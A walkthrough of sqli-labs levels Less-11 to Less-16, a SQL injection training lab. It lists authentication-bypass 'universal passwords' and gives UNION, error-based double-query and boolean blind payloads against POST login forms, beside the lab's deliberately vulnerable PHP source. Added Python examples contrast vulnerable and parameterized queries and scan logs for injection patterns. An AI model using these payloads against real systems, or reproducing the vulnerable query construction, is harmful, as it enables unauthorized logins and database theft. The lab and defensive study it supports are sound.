Less-11 POST - Error Based - Single quotes - String
Error-based single-quote string injection
How do you bypass authentication and log in? With a "universal password" (an authentication-bypass payload).
Commonly used universal passwords
asp / aspx
1: "or "a"="a
2: ')or('a'='a
3: or 1=1--
4: 'or 1=1--
5: a'or' 1=1--
6: "or 1=1--
7: 'or'a'='a
8: "or"="a'='a
9: 'or''='
10: 'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
16: a newer universal login password
Username: ' UNION Select 1,1,1 FROM admin Where ''=' (replace admin with the actual table name)
Password: 1
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
17: admin' or 'a'='a (any password)
PHP universal passwords
'or'='or'
'or 1=1/* (string type; works whether magic_quotes_gpc is on or off)
User: something
Pass: ' OR '1'='1
jsp universal passwords
1'or'1'='1
admin' OR 1=1/*
Username: admin (only useful when this user actually exists on the system)
Password: 1'or'1'='1
Payload
(1) Universal password
Append the universal password to the passwd field, closing the single quote:
uname=admin&passwd=1' or '1'='1&submit=Submit
Returns:
Your Login name:Dumb
Your Password:Dumb
Append the universal password to the uname field instead, closing the single quote:
uname=admin' or '1'='1&passwd=1&submit=Submit
Returns:
Your Login name:admin
Your Password:admin
The two requests return different accounts and passwords. Look at the source code:
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
The SQL statement is:
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
Case 1:
SELECT username, password FROM users WHERE username='admin' and password='1' or '1'='1' LIMIT 0,1
Case 2:
SELECT username, password FROM users WHERE username='admin' or '1'='1' and password='1' LIMIT 0,1
and binds tighter than or. In case 1 the left-hand part, username='admin' and password='1', is false for every row, but false or '1'='1' is true for every row, so LIMIT 0,1 returns the first account and password in the table. In case 2 the right-hand part, '1'='1' and password='1', is false, but the account admin exists, so username='admin' or false is true for exactly that row and admin's account and password are returned.
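To make the precedence argument concrete, here is an added Python example (not part of the original write-up or of sqli-labs) that reproduces the two queries against an in-memory SQLite table. The users fixture is constructed to mirror the lab's ordering (Dumb is the first row, admin a later one). The lab's string-concatenated query is kept as login_vulnerable, deliberately unsafe, and placed beside a parameterized version; with bound parameters both universal-password inputs are compared as literal strings and return no row.

```python
import sqlite3

# Constructed fixture mirroring the sqli-labs users table order: Dumb first, admin later.
USERS = [("Dumb", "Dumb"), ("Angelina", "I-kill-you"), ("admin", "admin")]


def make_db():
    """Build an in-memory users table with the constructed fixture."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, uname, passwd):
    """Same string concatenation as the Less-11 query: kept vulnerable on purpose.

    Because `and` binds tighter than `or`, an injected `or '1'='1'` in passwd
    makes the whole WHERE clause true for every row, while the same text in
    uname only widens the username test.
    """
    sql = (
        "SELECT username, password FROM users "
        f"WHERE username='{uname}' and password='{passwd}' LIMIT 0,1"
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn, uname, passwd):
    """Hardened form: the driver binds values, so quotes in the input are just data."""
    sql = "SELECT username, password FROM users WHERE username=? and password=? LIMIT 0,1"
    return conn.execute(sql, (uname, passwd)).fetchone()


def compare(uname, passwd):
    """Run one credential pair through both versions and return (vulnerable, hardened)."""
    conn = make_db()
    return login_vulnerable(conn, uname, passwd), login_parameterized(conn, uname, passwd)


if __name__ == "__main__":
    # Case 1 from the write-up: payload in passwd -> first row (Dumb) from the vulnerable query.
    print("case 1:", compare("admin", "1' or '1'='1"))
    # Case 2: payload in uname -> admin's row from the vulnerable query.
    print("case 2:", compare("admin' or '1'='1", "1"))
    # The hardened query still works for a genuine credential pair.
    print("genuine:", compare("admin", "admin"))
```

Running the script prints the Dumb row for case 1 and the admin row for case 2 from the vulnerable query, and None from the parameterized one for both; only the genuine admin/admin pair logs in through the hardened path.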
(2) UNION query
uname=test &passwd=test' order by 3%23 returns an error
uname=test &passwd=test' order by 2%23 returns normally
uname=test &passwd=test' union select 1,2 %23
Returns: Your Login name:1
Your Password:2
The remaining steps for extracting database information are the same as in the earlier GET levels.
Less-12 POST - Error Based - Double quotes - String - with twist
Error-based double-quote string injection with parentheses
Similar to Less-11.
Payload
1. Comment out the rest of the query
uname=admin &passwd=1") or "1"="1" %23
2. Close the quote and parenthesis instead
uname=admin &passwd=1") or ("1"="1
uname=admin") or( "1"="1 &passwd=1
UNION query
uname=test &passwd=test") order by 3 %23 returns an error
uname=test &passwd=test") order by 2 %23 returns normally
uname=test &passwd=test") union select 1,2 %23
Returns:
Your Login name:1
Your Password:2
Same as above.
Less-13 POST - Double Injection - Single quotes - String - with twist
Testing
Add a single quote:
uname=test &passwd=test'
The error reads: ''test'') LIMIT 0,1'
So the variable is wrapped in a single quote and parentheses.
uname=test &passwd=test') %23 returns normally
uname=test &passwd=test') or 1=1%23 shows "successfully logged in"
Source code:
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
A successful login returns the flag.jpg image, whose text reads "successfully logged in"; a failure returns slap.jpg. The logged-in account and password are no longer displayed.
Payload
Universal password login
uname=test &passwd=test') or 1=1%23
Double-query (error-based) injection
For the principle, see Less-5.
uname=test &passwd=test') or 1=1 order by 3 %23 returns an error
uname=test &passwd=test') or 1=1 order by 2 %23 returns normally
uname=test &passwd=test') or 1=1 union select 1,2 %23 succeeds, but there is no display position
Use the double-query injection method:
uname=test &passwd=test') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a %23
Returns:
Duplicate entry '::security::1' for key 'group_key'
For the rest, refer to Less-5.
Less-14 POST - Double Injection - Double quotes - String - with twist
Testing
Single quote
uname=test &passwd=test' or 1=1 %23 returns the failure image
Double quote
uname=test &passwd=test"or 1=1 %23 returns the success image
The parameter is wrapped in double quotes.
Source code
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
Note that the dot is the string concatenation operator: a double quote is concatenated before and after each variable.
Echoing the variables directly while debugging shows this. For
uname=uname &passwd=passwd
the output is: "uname ""passwd"
The variables are wrapped in double quotes.
Test the column count
uname=uname &passwd=passwd" or 1=1 order by 2 %23
The rest is similar to Less-13.
Less-15 POST - Blind - Boolean/time Based - Single quotes
Boolean- or time-based single-quote POST blind injection
Testing
Appending a single quote, double quote, parenthesis and so on shows no error at all, only the failure image; the error output appears to have been commented out.
uname=uname &passwd=passwd' or 1=1 %23 returns success
Column count
uname=uname &passwd=passwd' or 1=1 order by 2 %23
Display position
uname=uname &passwd=passwd' or 1=1 union select 1,2 %23 executes successfully but nothing is echoed
Try double-query injection:
uname=test &passwd=test' or 1=1 union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a %23 succeeds, but no error is shown, so the data we want is not displayed
Why does double-query injection work in Less-13 and Less-14 but not here?
Less-15 source code
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
echo "<br>";
//echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
//print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
Comparing the two source files shows that in this level the print_r(mysql_error()); call is commented out, so the database error text that carried the data in Less-13 never reaches the response.
Payload
Use Boolean-based blind injection here:
uname=test &passwd=test' or length((select database())) =8 %23 returns success
For the rest, refer to Less-8.
Less-16 POST - Blind - Boolean/Time Based - Double quotes
Boolean- or time-based double-quote POST blind injection
Testing
uname=test &passwd=test ' or 1=1 %23 returns an error
uname=test &passwd=test') or 1=1 %23 returns an error
uname=test &passwd=test " or 1=1 %23 returns an error
uname=test &passwd=test") or 1=1 %23 returns success
Payload
Column count
uname=test &passwd=test ") or 1=1 order by 2%23 returns success
uname=test &passwd=test ") or 1=1 order by 3%23 returns an error
For the rest, refer to Less-15.
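Every level above writes the submitted credentials to result.txt ("User Name:" followed by the username, then "Password:" followed by the password; Less-11 and Less-15 omit the newline after the username, Less-13 includes it). That file is a ready-made audit trail for the injection attempts shown in Less-11 through Less-16, so here is an added Python example (not part of the original write-up or of sqli-labs) that parses both line layouts and flags records carrying the indicators seen on this page: a quote or parenthesis followed by or, union select, order by, information_schema or select database(), the floor(rand()) error-based trick, and a trailing comment. The log text is constructed from the page's own payloads (with %23 decoded to #) plus two benign logins, one containing an apostrophe, to show that a quote alone is not flagged. Passwords are deliberately left out of the scanner's output, since the lab storing them in cleartext is itself a weakness.

```python
import re

# Constructed result.txt excerpt: Less-11 style (no newline after the username)
# and Less-13 style (newline after the username), mixed, with %23 decoded to '#'.
LOG = """User Name:DumbPassword:Dumb
User Name:adminPassword:1' or '1'='1
User Name:admin' or '1'='1Password:1
User Name:testPassword:test') or 1=1 order by 2 #
User Name:test
Password:test') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a #
User Name:testPassword:test' or length((select database())) =8 #
User Name:alice
Password:O'Brien
"""

# Indicator patterns derived from the payload shapes used in Less-11 to Less-16.
INDICATORS = {
    "quote_or": re.compile(r"""['")]\s*or\b""", re.I),          # ' or 1=1 / ") or ...
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "order_by": re.compile(r"\border\s+by\s+\d", re.I),          # column-count probing
    "schema_probe": re.compile(r"information_schema|select\s+database\(\)", re.I),
    "error_based": re.compile(r"floor\(\s*rand\(", re.I),        # double-query trick
    "trailing_comment": re.compile(r"(?:--|#|/\*)\s*$"),         # %23, --, /* at the end
}


def parse_result_log(text):
    """Return (username, password) pairs from either result.txt layout."""
    records = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        if not line.startswith("User Name:"):
            i += 1
            continue
        body = line[len("User Name:"):]
        if "Password:" in body:
            # Less-11 layout: both fields on one line, split at the first marker.
            uname, passwd = body.split("Password:", 1)
            i += 1
        elif i + 1 < len(lines) and lines[i + 1].startswith("Password:"):
            # Less-13 layout: password on the following line.
            uname = body
            passwd = lines[i + 1][len("Password:"):]
            i += 2
        else:
            uname, passwd = body, ""
            i += 1
        records.append((uname, passwd))
    return records


def classify(uname, passwd):
    """Names of the indicators matched in either field, in INDICATORS order."""
    return [
        name for name, pat in INDICATORS.items()
        if pat.search(uname) or pat.search(passwd)
    ]


def scan(text):
    """Flagged records as (username, indicators); passwords are not echoed back."""
    flagged = []
    for uname, passwd in parse_result_log(text):
        hits = classify(uname, passwd)
        if hits:
            flagged.append((uname, hits))
    return flagged


if __name__ == "__main__":
    for uname, hits in scan(LOG):
        print(f"suspicious login attempt for {uname!r}: {', '.join(hits)}")
```

On the constructed excerpt the scanner flags five of the seven records and leaves the Dumb/Dumb and alice/O'Brien logins alone; the quote_or pattern requires the quote to be followed by the keyword, which is what separates an injected clause from an apostrophe in a real password.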